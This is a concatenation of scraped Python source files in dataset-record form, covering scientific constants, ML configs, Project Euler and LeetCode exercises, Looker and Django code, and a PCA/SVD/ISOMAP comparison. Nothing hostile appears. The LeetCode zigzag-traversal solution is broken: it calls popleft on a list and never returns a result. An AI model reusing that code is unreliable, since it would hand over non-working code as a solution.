#\nthreshold_for_snowheight = 800.0 # density threshold when layer is classified as snow\n\n\nliquid_water_fraction = 0.05 # irreducible water content of a snow layer;\n # fraction of total mass of the layer [%/100]\npercolation_velocity = 0.0006 # percolation velocity for unsaturated layers [m s-1] (0.06 cm s-1)\n # how does it change with density?\n # Martinec, J.: Meltwater percolation through an alpine snowpack, Avalanche\n # Formation, Movement and Effects, Proceedings of the Davos Symposium, 162, 1987.\n\n' PHYSICAL CONSTANTS '\n\nlat_heat_melting = 3.34e5 # latent heat for melting [J kg-1]\nlat_heat_vaporize = 2.5e6 # latent heat for vaporization [J kg-1]\nlat_heat_sublimation = 2.834e6 # latent heat for sublimation [J kg-1]\nspec_heat_air = 1004.67 # specific heat of air [J kg-1 K-1]\nspec_heat_ice = 2050.00 # specific heat of ice [J Kg-1 K-1]\nsigma = 5.67e-8 # Stefan-Bolzmann constant [W m-2 K-4]\ngravity_acceleration = 9.81 # acceleration of gravity (Braithwaite 1995) [m s-1]\n\n' MODEL CONSTANTS '\nwater_density = 1000.0 # density of water [kg m^(-3)]\nice_density = 917. # density of ice [kg m^(-3)]\n\nzero_temperature = 273.16 # Kelvin [K]\n\n' Densification constants '\nK0 = 11 # rate factors [-]\nK1 = 575\nE0 = 10260 # activation energy\nE1 = 21400\nR = 8.3144 # universal gas constant [J K-1 mol-1]\n","repo_name":"benatouba/cosipy","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"24844084554","text":"\"\"\"\nVariables related to data or storage\n\"\"\"\n# Base URL for anonymous read access to Blob Storage container\nSTORAGE_CONTAINER = 'https://bostondata.blob.core.windows.net/scenario-document-collection-analysis/'\n\n# The AMLWorkbench folder used to save intermediate files in a run\n# Do NOT change it\nOUTPUT_PATH = 'outputs'\n\n# The dataset file name, change this to use a small dataset\n# DATASET_FILE = 'CongressionalDataAll_Jun_2017.tsv'\nDATASET_FILE = 'small_data.tsv'\n\n# The black list of words to ignore\nBLACK_LIST_FILE = 'black_list.txt'\n\n# The non-content bearing function words\nFUNCTION_WORDS_FILE = 'function_words.txt'\n\n\n\"\"\"\nVariables related to intermediate files\n\"\"\"\n# The file name used to save the cleaned and sentenced text data\nCLEANED_DATA_FILE_NAME = 'CongressionalDocsCleaned.tsv'\n\n# The learned phrases file\n# The file name will be renamed in the format of _phrase_.txt\nLEARNED_PHRASES_FILE = 'CongressionalDocsLearnedPhrases.txt'\n\n# The text data with phrase rewrites\n# The file name will be renamed in the format of _phrase_.txt\nPHRASE_TEXT_FILE = 'CongressionalDocsPhraseTextData.txt'\n\n# The model vocabulary and surface form mapping file\n# The file name will be renamed in the format of _phrase_.txt\nSURFACE_MAPPING_FILE = 'Vocab2SurfaceFormMapping.tsv'\n\n# The reconstituted text file name\n# The file name will be renamed in the format of _phrase_.txt\nRECONSTITUTED_TEXT_FILE = 'CongressionalDocsProcessed.tsv'\n\n\n\n\"\"\"\nVariables related to run configuration\n\"\"\"\n# Maximum number of phrases to learn\nMAX_NUM_PHRASE = 1000\n\n# Maximum number of phrases to learn per iteration\nMAX_PHRASE_PER_ITER = 500\n\n# Maximum number of words allowed in the learned phrases\nMAX_PHRASE_LENGTH = 7\n\n# Minimum number of times a phrase must occur in the data to\n# be considered during the phrase learning process\nMIN_INSTANCE_COUNT = 5\n\n\n\"\"\"\nVariables related to train the LDA topic model\n\"\"\"\n# Minimum word count in the corpus\nMIN_WORD_COUNT = 5\n\n# Minimum count of documents that contain a specific word\nMIN_DOC_COUNT = 2\n\n# The maximum document frequency that contain a specific word\nMAX_DOC_FREQ = 0.25\n\n# The number of topics need to train\nNUM_TOPICS = 20\n\n# The number of iterations during training the LDA model\nNUM_ITERATIONS = 2000\n\n# Number of passes through the entire corpus\nNUM_PASSES = 1\n\n# Number of documents to load into memory at a time and process E step of EM\nCHUNK_SIZE = 1000\n\n# The random number during training the LDA model\nRANDOM_STATE = 1\n\n# The file name of LDA model file\n# This file name will be automatically renamed in the format of:\n# _____.pickle\nLDA_FILE = \"CongressionalDocsLDA.pickle\"\n\n# The transformed document topic probability matrix file\n# This file name will be automatically renamed in the format of:\n# _____.npy\nDOC_TOPIC_PROB_FILE = \"CongressionalDocTopicProbs.npy\"\n\n\n","repo_name":"Azure-Samples/MachineLearningSamples-DocumentCollectionAnalysis","sub_path":"Code/documentAnalysis/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"18"} +{"seq_id":"72328730921","text":"def lcsseq(str1, str2):\n if(len(str1) == 0 or len(str2) == 0):\n return 0\n\n if(str1[0] == str2[0]):\n return 1 + lcsseq(str1[1:], str2[1:])\n else:\n return max(lcsseq(str1, str2[1:]), lcsseq(str1[1:], str2))\n\nprint(lcsseq(\"abde\", \"aedwe\"))\n\n\ndef lcs_seq_dp(str1, str2):\n dp = [[0 for j in range(len(str2)+1)] for i in range(len(str1)+1)]\n\n for i in range(len(str1)+1):\n for j in range(len(str2)+1):\n if(i == 0 or j == 0):\n dp[i][j] = 0\n elif(str1[i-1] == str2[j-1]):\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i][j-1], dp[i-1][j])\n\n print(dp)\n return dp[-1][-1]\n\nprint(lcs_seq_dp(\"abde\", \"aedwe\")) \n","repo_name":"sivakumarmedidi/WorkArounds","sub_path":"DSA/Algos/DP/lcsseq.py","file_name":"lcsseq.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70583476521","text":"import json\n\nfrom summarize_from_feedback.utils import blobs\n\n# ['id', 'subreddit', 'title', 'post', 'summary']\n# t3_1ov8e0 -> id\n# and k != \"subreddit\"\n\n\ndef tldr_filtered_generator(split):\n assert split in [\"test\", \"train\", \"valid\"]\n\n f = open('results_new.json', 'r')\n datas = json.load(f)\n datas = json.loads(datas)\n datas = datas['results']\n for data in datas:\n for artcle in data['articles']:\n yield dict(reference=data[\"event_synopis\"], article=artcle['headline'] + ' ' + \" \".join(artcle['article_body'].split()[:100]))\n\n\ndef tldr_filtered_queries_generator(split):\n assert split in [\"test\", \"train\", \"valid\"]\n\n gcs_path = f\"https://openaipublic.blob.core.windows.net/summarize-from-feedback/datasets/tldr_3_filtered_queries/{split}.jsonl\"\n with blobs.open_file_cached(gcs_path, \"rb\") as f:\n datas = [json.loads(l) for l in f.readlines()]\n\n for data in datas:\n # NOTE: don't use ref summary, not filtered\n yield dict(reference=data[\"summary\"], **{k: v for (k, v) in data.items() if k != \"summary\"})\n\n\nif __name__ == \"__main__\":\n for x in tldr_filtered_generator(\"train\"):\n print(list(x.keys()))\n break\n","repo_name":"badrinath-newzera/openai-summary-inference","sub_path":"summarize_from_feedback/datasets/tldr.py","file_name":"tldr.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74069774439","text":"target = 1000\n\n#We're making an assumption without loss of generality that a < b < c\nfor a in range(1,1000):\n for b in range(a,1000):\n c = 1000 - a - b\n if a**2 + b**2 == c**2:\n if a + b+ c == target:\n print('A: %f' % a)\n print('B: %f'% b)\n print(\"C: %f\" % c)\n print(a*b*c)\n break\n\n# I think the answer is 31875000","repo_name":"jdgsmallwood/ProjectEuler","sub_path":"project_euler_solutions/problem_9.py","file_name":"problem_9.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29979232508","text":"from tqdm import tqdm\nimport logging\nfrom lmanage.utils.errorhandling import return_sleep_message\nfrom lmanage.utils.looker_object_constructors import BoardObject\nfrom lmanage.utils import logger_creation as log_color\nfrom yaspin import yaspin\n#logger = log_color.init_logger(__name__, logger_level)\n\n\nclass CaptureBoards():\n def __init__(self, sdk):\n self.sdk = sdk\n\n def handle_board_structure(self, board_response: dict) -> dict:\n board_section_list = board_response.board_sections\n bs_list = []\n\n for board_section in board_section_list:\n board_item_list = board_section.board_items\n new_bi_list = [board_item.__dict__ for board_item in board_item_list] \n board_section['board_items'] = new_bi_list\n bs_dict = board_section.__dict__\n bs_list.append(bs_dict)\n\n board_response['board_sections'] = bs_list\n\n return board_response \n \n\n def get_all_boards(self) -> dict:\n response = []\n with yaspin().white.bold.shark.on_blue as sp:\n sp.text=\"getting all system board metadata (can take a while)\"\n all_system_boards = self.sdk.all_boards()\n \n for board in all_system_boards:\n bresponse = self.handle_board_structure(board_response=board)\n b = BoardObject(\n content_metadata_id=board.content_metadata_id,\n section_order=board.section_order,\n title=board.title,\n primary_homepage=board.primary_homepage,\n description=board.description,\n board_sections=bresponse.board_sections\n )\n response.append(b)\n return response\n\n\n def execute(self):\n all_boards = self.get_all_boards()\n return all_boards","repo_name":"looker-open-source/lmanage","sub_path":"lmanage/capturator/content_capturation/board_capture.py","file_name":"board_capture.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"22578383463","text":"import json\nimport os\nimport subprocess\nfrom xml.dom import minidom\n\nfrom exit_codes import ExitCode, log_err\n\nMI_EXTENSIONS = [\"c\", \"cc\", \"cpp\", \"c++\"]\n\n\nclass Mi:\n def __init__(self, path):\n self.mi_path = os.path.join(path, \"Maintainability_Index\", \"lizard\")\n\n def run_n_parse_mi(self, files_list: list, output_dir: os.path):\n mi_tool_res = self.run_tool_mi(files_list)\n return mi_tool_output_reader(mi_tool_res.decode())\n\n def run_tool_mi(self, files_list: list):\n try:\n args = [self.mi_path, \"-X\"]\n args.extend(files_list)\n results = subprocess.run(args, capture_output=True, check=True)\n return results.stdout\n\n except subprocess.CalledProcessError as ex:\n log_err(\n \"\\tMaintainability Index Tool exited with an error.\\n{}\\n{}\\n\",\n ExitCode.MI_TOOL_ERR,\n ex.stdout,\n ex.stderr,\n )\n\n\ndef mi_tool_output_reader(xml_str: str):\n xml = minidom.parseString(xml_str)\n\n global_metrics = {}\n\n per_function_res = []\n per_file_res = []\n\n def _get_label_list(measure_tag):\n label_list = []\n\n labels = measure_tag.getElementsByTagName(\"label\")\n for label in labels:\n label_list.append(label.firstChild.nodeValue)\n\n return label_list\n\n def _get_values_object(item_tag, label_list):\n metrics_output = {}\n\n # Get metrics values of a file\n values = item_tag.getElementsByTagName(\"value\")\n for label, value in zip(label_list, values):\n if label == \"Maintainability\":\n # To have the standard MI formula\n metrics_output[label] = int(\n float(value.firstChild.nodeValue) * 171 / 100\n )\n else:\n metrics_output[label] = value.firstChild.nodeValue\n\n return metrics_output\n\n measures = xml.getElementsByTagName(\"measure\")\n\n for measure in measures:\n if measure.getAttribute(\"type\") == \"Function\":\n # Get metrics name\n per_function_list = _get_label_list(measure)\n\n items = measure.getElementsByTagName(\"item\")\n for item in items:\n # Get name, start row and filename of a function\n name = item.getAttribute(\"name\")\n func_name = name[0 : name.find(\"(...) at \")]\n line_number = name[name.rfind(\":\") + 1 :]\n file_in = name[name.find(\"(...) at \") + 9 : name.rfind(\":\")]\n\n # Get metrics values of a function\n per_function_values = _get_values_object(\n item, per_function_list\n )\n\n per_function_res.append(\n {\n \"filename\": file_in,\n \"func_name\": func_name,\n \"line_number\": line_number,\n \"values\": per_function_values,\n }\n )\n elif measure.getAttribute(\"type\") == \"File\":\n\n # Get global metrics for each file\n per_file_list = _get_label_list(measure)\n\n items = measure.getElementsByTagName(\"item\")\n for item in items:\n\n # Get metrics values of a file\n metrics_output = _get_values_object(item, per_file_list)\n\n output = {\n \"filename\": item.getAttribute(\"name\"),\n **metrics_output,\n }\n\n per_file_res.append(output)\n\n # Get global metrics computed using all files\n sum_tags = measure.getElementsByTagName(\"sum\")\n for tag in sum_tags:\n global_metrics[tag.getAttribute(\"lable\")] = tag.getAttribute(\n \"value\"\n )\n\n global_metrics[\"files\"] = []\n for global_file in per_file_res:\n\n global_file[\"functions\"] = []\n for func_name in per_function_res:\n if func_name[\"filename\"] == global_file[\"filename\"]:\n global_file[\"functions\"].append(func_name)\n\n global_metrics[\"files\"].append(global_file)\n\n return global_metrics\n\n\ndef standardizer_mi(data):\n\n formatted_output = {}\n\n formatted_output[\"LOC\"] = int(data[\"NCSS\"])\n formatted_output[\"CC\"] = float(data[\"CCN\"])\n formatted_output[\"classes\"] = []\n formatted_output[\"files\"] = []\n\n for file in data[\"files\"]:\n files = {}\n files[\"filename\"] = file[\"filename\"]\n files[\"LOC\"] = int(file[\"NCSS\"])\n files[\"CC\"] = float(file[\"CCN\"])\n files[\"MI\"] = float(file[\"Maintainability\"])\n\n files[\"functions\"] = []\n for func_name in file[\"functions\"]:\n funcs = {}\n funcs[\"function name\"] = func_name[\"func_name\"]\n funcs[\"line number\"] = func_name[\"line_number\"]\n\n funcs[\"LOC\"] = int(func_name[\"values\"][\"NCSS\"])\n funcs[\"CC\"] = float(func_name[\"values\"][\"CCN\"])\n funcs[\"MI\"] = float(func_name[\"values\"][\"Maintainability\"])\n files[\"functions\"].append(funcs)\n\n formatted_output[\"files\"].append(files)\n\n return formatted_output\n\n\ndef helper_test_mi(standardized_output: dict, output: dict):\n\n output[\"LOC\"] = standardized_output[\"LOC\"]\n output[\"CC\"] = standardized_output[\"CC\"]\n output[\"classes\"] = standardized_output[\"classes\"]\n output[\"files\"] = []\n\n for file in standardized_output[\"files\"]:\n file_metrics = {\n \"filename\": file[\"filename\"],\n \"LOC\": file[\"LOC\"],\n \"CC\": file[\"CC\"],\n \"MI\": file[\"MI\"],\n \"functions\": file[\"functions\"],\n }\n output[\"files\"].append(file_metrics)\n","repo_name":"SoftengPoliTo/SoftwareMetrics","sub_path":"mi.py","file_name":"mi.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"70029207719","text":"from rest_framework import serializers\n\nfrom core.serializers import SemesterSerializer\nfrom core.serializers import UserSimpleSerializer\nfrom members.models import Member\n\n\nclass MemberSerializer(serializers.ModelSerializer):\n semester = SemesterSerializer(read_only=True, required=False)\n seller = UserSimpleSerializer(read_only=True)\n last_edited_by = UserSimpleSerializer(read_only=True)\n\n class Meta:\n model = Member\n fields = (\n \"id\",\n \"name\",\n \"email\",\n \"date_joined\",\n \"semester\",\n \"lifetime\",\n \"honorary\",\n \"date_lifetime\",\n \"uio_username\",\n \"seller\",\n \"comments\",\n \"last_edited_by\",\n )\n\n\nclass AddMemberSerializer(serializers.Serializer):\n name = serializers.CharField(\n max_length=50, help_text=\"name of user, max 50 letters\"\n )\n email = serializers.EmailField(allow_blank=True)\n lifetime = serializers.BooleanField(help_text=\"Is the member a lifetime member?\")\n uio_username = serializers.CharField(\n max_length=15,\n allow_blank=True,\n required=False,\n help_text=\"Your Uio username. Is optional.\",\n )\n\n\nclass MemberSimpleSerializer(serializers.Serializer):\n class Meta:\n model = Member\n fields = (\n \"id\",\n \"name\",\n \"email\",\n \"date_joined\",\n \"semester\",\n \"lifetime\",\n \"honorary\",\n \"date_lifetime\",\n \"uio_username\",\n \"seller\",\n \"comments\",\n \"last_edited_by\",\n )\n\n\nclass MemberSemesterSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n semester = serializers.CharField()\n lifetime = serializers.IntegerField(\n help_text=\"Number of lifetimemembers sold that semester\"\n )\n normal = serializers.IntegerField(\n help_text=\"Number of normal semester members that semester\"\n )\n honorary = serializers.IntegerField(\n help_text=\"Number of honnorary memberships givenout that semester\"\n )\n","repo_name":"cybernetisk/internsystem","sub_path":"members/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"13531811314","text":"# encoding=utf-8\nimport numpy as np\nfrom collections import Counter\nfrom itertools import product\nfrom dijkstar import Graph\nfrom dijkstar.algorithm import single_source_shortest_paths\nimport time\n\nsonar_test = './sonar-test.txt'\nsonar_train = './sonar-train.txt'\nsplice_test = './splice-test.txt'\nsplice_train = './splice-train.txt'\nmax_dis = float(\"inf\")\nisomap_k = 12\n\n\"\"\"\nUse a property of Laplacian matrix to judge weather the graph is connected.\nThe property is that The number of times 0 appears as an eigenvalue in the Laplacian\nis the number of connected components in the graph.\n\"\"\"\ndef is_connected(graph_mat, max_dis):\n n = graph_mat.shape[0]\n adjacency_mat = np.tile(np.matrix(np.tile(0, n)).transpose(), n)\n\n def f(x, y):\n adjacency_mat[x, y] = 1\n\n list((f(i, j) for i, j in product(range(n), range(n)) if graph_mat[i, j] != max_dis and i != j))\n degree = np.sum(adjacency_mat, axis=1).transpose().tolist()[0]\n degree_mat = np.diag(degree)\n laplacian_matrix = degree_mat - adjacency_mat\n eigenvalues, eigenvectors = np.linalg.eig(laplacian_matrix)\n zeros = [e for e in eigenvalues if abs(e) < 1e-10]\n return True if len(zeros) == 1 else False\n\n\n# Get the k nearest points\ndef knn_point(train_mat, test_vec, k):\n test_mat = np.tile(test_vec, train_mat.shape[1])\n dis_mat = np.sqrt(np.square(train_mat - test_mat).sum(axis=0))\n dis_min_k = np.argsort(dis_mat).tolist()[0][0:k]\n return dis_min_k, dis_mat\n\n\n# Implementation of K-NN\ndef knn_label(train_mat, train_labels, test_vec, k):\n dis_min_top_k = knn_point(train_mat, test_vec, k)[0]\n labels = [train_labels[i] for i in dis_min_top_k]\n if k == 1:\n return labels[0]\n count_labels = Counter(labels)\n order_labels = sorted(count_labels.items(), key=lambda d: d[1])\n return order_labels[len(order_labels) - 1][0]\n\n\n# Calculate the accuracy of predicting the label of testing examples\ndef train_test(train_mat_low, train_label, test_mat_low, test_label, knn_k, top_k):\n total_test = test_mat_low.shape[1]\n right = 0\n for i in range(total_test):\n label_pre = knn_label(train_mat_low, train_label, test_mat_low[:, i], knn_k)\n if label_pre == test_label[i]:\n right += 1\n if top_k > 0:\n print(\"k = %d and the accuracy is %d / %d = %f\" % (top_k, right, total_test, right / total_test))\n else:\n print(\"the accuracy is %d / %d = %f\" % (right, total_test, right / total_test))\n\n\n# Read training and testing data to matrices\ndef read_data(data_file):\n data_raw = []\n data_label = []\n file = open(data_file, 'r')\n for line in file:\n row_raw = line.strip('\\n').split(',')\n data_raw.append(row_raw[0:len(row_raw) - 1])\n data_label.append(row_raw[len(row_raw) - 1])\n return np.matrix(data_raw, dtype=np.float).transpose(), data_label\n\n\n# Use the data to learn the projection matrix.\ndef pca_pro_mat(data_mat, k):\n # remove means\n mean_vec = np.mean(data_mat, axis=1)\n # print(mean_vec.shape)\n data_mat = data_mat - mean_vec\n # calculate the covariance matrix\n covariance_mat = np.cov(data_mat)\n # calculate the eigenvalues and the eigenvectors of the covariance matrix\n eigenvalues, eigenvectors = np.linalg.eig(covariance_mat)\n # calculate the k largest eigenvectors\n eigenvalues_top_k = np.argsort(-eigenvalues)[0:k]\n eigenvectors_top_k = eigenvectors[:, eigenvalues_top_k]\n return eigenvectors_top_k\n\n\n# Project the data and to the lower-dimensional space via the projection matrix\ndef pca(data_mat, pro_mat):\n # data_mat_low = (data_mat.transpose() * pro_mat).transpose()\n # print(pro_mat.shape, data_mat.shape)\n data_mat_low = pro_mat.transpose() * data_mat\n # print(data_mat_low.shape)\n return data_mat_low\n\n\n# Main method for testing PCA\ndef pca_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n for k in ks:\n pro_mat = pca_pro_mat(train_mat, k)\n train_mat_low = pca(train_mat, pro_mat)\n test_mat_low = pca(test_mat, pro_mat)\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\n# Use the data to learn the projection matrix.\ndef svd_w(data_mat, k):\n # use the existing tools directly to conduct SVD of a matrix\n u, s, v = np.linalg.svd(data_mat)\n return u[:, 0:k]\n\n\n# Project the data and to the lower-dimensional space via the projection matrix\ndef svd(data_mat, w):\n return w.transpose() * data_mat\n\n\n# Main method for testing SVD\ndef svd_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n for k in ks:\n w = svd_w(train_mat, k)\n train_mat_low = svd(train_mat, w)\n test_mat_low = svd(test_mat, w)\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\n# Calculate the k that makes the graph connected.\ndef min_k_connected(train_mat, test_mat):\n k = 4\n while True:\n mat = graph_knn(train_mat, test_mat, k)\n if is_connected(mat, max_dis):\n print('k = %d, the graph is connected.' % k)\n return k\n k += 1\n\n\n# Use K-NN to construct a weighted graph\ndef graph_knn(train_mat, test_mat, k):\n data_mat = np.column_stack((train_mat, test_mat))\n n = data_mat.shape[1]\n mat = np.matrix(np.tile(max_dis, n)).transpose()\n mat = np.tile(mat, n)\n for i in range(data_mat.shape[1]):\n top_k_points, dis_mat = knn_point(data_mat, data_mat[:, i], k + 1)\n for j in top_k_points:\n mat[i, j] = dis_mat[0, j]\n mat[j, i] = dis_mat[0, j]\n return mat\n\n\n# Generate the distance matrix\ndef dist_mat(train_mat, test_mat, k):\n # construct a weighted graph\n mat = graph_knn(train_mat, test_mat, k)\n n = mat.shape[0]\n graph = Graph()\n list((graph.add_edge(i, j, {'cost': mat[i, j]}) for i, j in product(range(n), range(n)) if\n i != j and mat[i, j] != max_dis))\n if graph is None:\n return\n cost_func = lambda u, v, e, prev_e: e['cost']\n mat = np.zeros((n, n))\n # the shortest path from node i to node j is the distance between i and j\n def dis(i):\n single_short_path = single_source_shortest_paths(graph, i, cost_func=cost_func)\n for j in range(n):\n if j != i:\n mat[i, j] = extract_shortest_path(single_short_path, j)\n else:\n mat[i, j] = 0\n list((dis(i) for i in range(n)))\n return mat\n\n\n# extract shortest path from the results calculated by 'dijkstar'\ndef extract_shortest_path(predecessors, d):\n # costs of the edges on the shortest path from s to d\n costs = []\n try:\n u, e, cost = predecessors[d]\n while u is not None:\n costs.append(cost)\n u, e, cost = predecessors[u]\n costs.reverse()\n return sum(costs)\n except Exception:\n print('The graph is not connected')\n exit()\n\n\n# Eigen decompose\ndef isomap_eig(mat):\n n = mat.shape[0]\n # the squared proximity matrix\n mat2 = np.square(mat)\n # double centering\n c = np.eye(n) - 1 / n\n # calculate the dot-product matrix\n b = -0.5 * c.dot(mat2).dot(c)\n eigenvalues, eigenvectors = np.linalg.eig(b)\n return eigenvalues, eigenvectors\n\n\n# Calculate the lower-dimensional matrix\ndef isomap_w(eigenvalues, eigenvectors, k):\n eigenvalues_top_k_index = np.argsort(-eigenvalues)[0:k]\n # the k largest eigenvalues and eigenvectors\n eigenvalues_top_k = eigenvalues[eigenvalues_top_k_index]\n eigenvectors_top_k = eigenvectors[:, eigenvalues_top_k_index]\n w = eigenvectors_top_k.dot(np.diag(np.sqrt(eigenvalues_top_k)))\n return w.transpose()\n\n\n# Main method for testing ISOMAP\ndef isomap_main(train_mat, train_label, test_mat, test_label, ks):\n t1 = time.time()\n mat = dist_mat(train_mat, test_mat, isomap_k)\n eigenvalues, eigenvectors = isomap_eig(mat)\n for k in ks:\n w = isomap_w(eigenvalues, eigenvectors, k)\n train_n = train_mat.shape[1]\n test_n = test_mat.shape[1]\n train_mat_low = np.matrix(w[:, 0: train_n])\n test_mat_low = np.matrix(w[:, train_n: train_n + test_n])\n train_test(train_mat_low, train_label, test_mat_low, test_label, 1, k)\n print('cost: %f s\\n' % (time.time() - t1))\n\n\nif __name__ == '__main__':\n sonar_train_mat, sonar_train_label = read_data(sonar_train)\n sonar_test_mat, sonar_test_label = read_data(sonar_test)\n splice_train_mat, splice_train_label = read_data(splice_train)\n splice_test_mat, splice_test_label = read_data(splice_test)\n\n # min_k_connected(sonar_train_mat, sonar_test_mat)\n # min_k_connected(splice_train_mat, splice_test_mat)\n\n print('No reduction:')\n print('sonar:')\n train_test(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, 1, 0)\n print('splice:')\n train_test(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, 1, 0)\n\n print('\\nPCA:')\n print('sonar:')\n pca_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n pca_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n print('\\nSVD:')\n print('sonar:')\n svd_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n svd_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n print('\\nISOMAP:')\n print('sonar:')\n isomap_main(sonar_train_mat, sonar_train_label, sonar_test_mat, sonar_test_label, (10, 20, 30))\n print('splice:')\n isomap_main(splice_train_mat, splice_train_label, splice_test_mat, splice_test_label, (10, 20, 30))\n\n","repo_name":"sunzequn/Assignments_NJU","sub_path":"DM/Assignment_02/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34024771928","text":"from QuadraticEquation import QuadraticEquation\nequations = []\n\n# f = open(\"input01.txt\")\nwith open(\"input01.txt\") as f:\n for line in f:\n try:\n a, b, c = [float(el) for el in line.split()]\n equations.append(QuadraticEquation(a, b, c))\n except ValueError:\n break\n\nequations_no_solutions = [] # не мають розв’язків;\nequations_one_solutions = [] # мають один розв’язок;\nequations_two_solutions = [] # мають два розв’язки;\nequations_inf_solutions = [] # мають нескінченну кількість розв’язків.\n\nfor eq in equations:\n sol_num = eq.solutions_number()\n if sol_num == 0:\n equations_no_solutions.append(eq)\n elif sol_num == 1:\n equations_one_solutions.append(eq)\n elif sol_num == 2:\n equations_two_solutions.append(eq)\n else:\n equations_inf_solutions.append(eq)\n\nprint(\"Рівняння, що не мають розв'язків:\")\nfor e in equations_no_solutions:\n e.show()\nprint(\"Рівняння, що мають один розв'язок:\")\nfor e in equations_one_solutions:\n e.show()\nprint(\"Рівняння, що мають два розв'язки:\")\nfor e in equations_two_solutions:\n e.show()\nprint(\"Рівняння, що мають нескінченну кількість розв'язків:\")\nfor e in equations_inf_solutions:\n e.show()\n\neq_with_min_solution = equations_one_solutions[0]\nmin_solution = eq_with_min_solution.solve()[0]\nfor eq in equations_one_solutions:\n x = eq.solve()[0]\n # print(x)\n if min_solution > x:\n eq_with_min_solution = eq\n min_solution = x\n\nprint(\"++++++++++++++++++++++++++++++++\")\nprint(\"++++++++++++++++++++++++++++++++\")\neq_with_min_solution.show()\nprint(min_solution)\n","repo_name":"krenevych/Prog2021","sub_path":"Mat22/O01/t01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11001304202","text":"'''\r\n给定一个二叉树,返回其节点值的锯齿形层序遍历。(即先从左往右,再从右往左进行下一层遍历,以此类推,层与层之间交替进行)。\r\n\r\n例如:\r\n给定二叉树 [3,9,20,null,null,15,7],\r\n\r\n 3\r\n / \\\r\n 9 20\r\n / \\\r\n 15 7\r\n返回锯齿形层序遍历如下:\r\n\r\n[\r\n [3],\r\n [20,9],\r\n [15,7]\r\n]\r\n\r\n来源:力扣(LeetCode)\r\n链接:https://leetcode-cn.com/problems/binary-tree-zigzag-level-order-traversal\r\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\r\n'''\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def zigzagLevelOrder(self, root: TreeNode):\r\n result = []\r\n if not root:\r\n return result\r\n queue = [root, \"*\"]\r\n level = 0\r\n tmp = [root]\r\n while queue:\r\n node = queue.popleft()\r\n if node=='*':\r\n result.append(tmp)\r\n tmp = []\r\n continue\r\n if level%2==0:\r\n if node.left:\r\n tmp.append(node.left)\r\n queue.append(node.left)\r\n if node.right:\r\n tmp.append(node.right)\r\n queue.append(node.right)\r\n level+=1\r\n elif level%2==1:\r\n queue.append(node.right)\r\n queue.append(node.left)\r\n result.append(tmp)\r\n","repo_name":"dunkle/leetcode_block","sub_path":"树问题/103. 二叉树的锯齿形层序遍历.py","file_name":"103. 二叉树的锯齿形层序遍历.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2839454058","text":"from prime_stuff import primes\nimport itertools\nimport timeit\n\nstart = timeit.default_timer()\n\n# ---------------------------------------------- #\nprime_set = set(n for n in primes(1000000))\ncircular_primes = 0\n\ndef check_circles(n):\n\tn = str(n)\n\tn0 = n\n\tfor i in range(1, len(n)):\n\t\texec('n'+str(i)+'=n'+str(i-1)+'[-1]+n'+str(i-1)+'[:-1]')\n\t\tif int(eval('n'+str(i))) not in prime_set:\n\t\t\treturn False\n\treturn True\n\nfor n in prime_set:\n\tif check_circles(n):\n\t\tcircular_primes += 1\n\nprint(circular_primes)\n# ---------------------------------------------- #\n\nend = timeit.default_timer()\nprint('---> took', round(end - start, 3), 'seconds')","repo_name":"ysshah/project-euler","sub_path":"prob35.py","file_name":"prob35.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23614065742","text":"#!/usr/bin/python\n# coding=utf-8\nimport requests\nimport unittest\nimport json,time,random\nfrom common.public import *\nfrom mysqlHandle.common_mysql import *\n\nclass ICEM_Interface(unittest.TestCase):\n\n 